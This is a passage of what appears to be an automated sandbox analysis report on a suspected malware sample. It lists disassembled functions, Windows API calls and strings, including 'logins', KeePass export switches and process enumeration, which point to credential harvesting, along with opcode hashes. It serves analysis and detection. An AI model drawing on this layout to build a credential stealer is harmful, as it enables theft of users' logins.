                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                            • String ID:
                                                            • API String ID: 1043902810-0
                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                            Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                            • wcscpy.MSVCRT ref: 004448B4
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                            • API String ID: 2899246560-1542517562
                                                            • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                            • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                            Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040DBCD
                                                            • memset.MSVCRT ref: 0040DBE9
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                            • API String ID: 3330709923-517860148
                                                            • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                            • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                            Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                            • memset.MSVCRT ref: 0040806A
                                                            • memset.MSVCRT ref: 0040807F
                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                            • memset.MSVCRT ref: 004081E4
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                            • String ID: logins$null
                                                            • API String ID: 2148543256-2163367763
                                                            • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                            • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                            Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • memset.MSVCRT ref: 004085CF
                                                            • memset.MSVCRT ref: 004085F1
                                                            • memset.MSVCRT ref: 00408606
                                                            • strcmp.MSVCRT ref: 00408645
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                            • memset.MSVCRT ref: 0040870E
                                                            • strcmp.MSVCRT ref: 0040876B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                            • String ID: ---
                                                            • API String ID: 3437578500-2854292027
                                                            • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                            • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                            Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0041087D
                                                            • memset.MSVCRT ref: 00410892
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                            • String ID:
                                                            • API String ID: 1010922700-0
                                                            • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                            • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                            Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                            • malloc.MSVCRT ref: 004186B7
                                                            • free.MSVCRT ref: 004186C7
                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                            • free.MSVCRT ref: 004186E0
                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                            • malloc.MSVCRT ref: 004186FE
                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                            • free.MSVCRT ref: 00418716
                                                            • free.MSVCRT ref: 0041872A
                                                            • free.MSVCRT ref: 00418749
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$FullNamePath$malloc$Version
                                                            • String ID: |A
                                                            • API String ID: 3356672799-1717621600
                                                            • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                            • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                            Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                            • API String ID: 2081463915-1959339147
                                                            • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                            • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                            Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                            • API String ID: 2012295524-70141382
                                                            • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                            • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                            Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                            • API String ID: 667068680-3953557276
                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                            Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                            • String ID:
                                                            • API String ID: 1700100422-0
                                                            • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                            • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                            Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                            • String ID:
                                                            • API String ID: 552707033-0
                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                            Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                            • strchr.MSVCRT ref: 0040C140
                                                            • strchr.MSVCRT ref: 0040C151
                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                            • memset.MSVCRT ref: 0040C17A
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                            Strings
                                                            Memory Dump Source
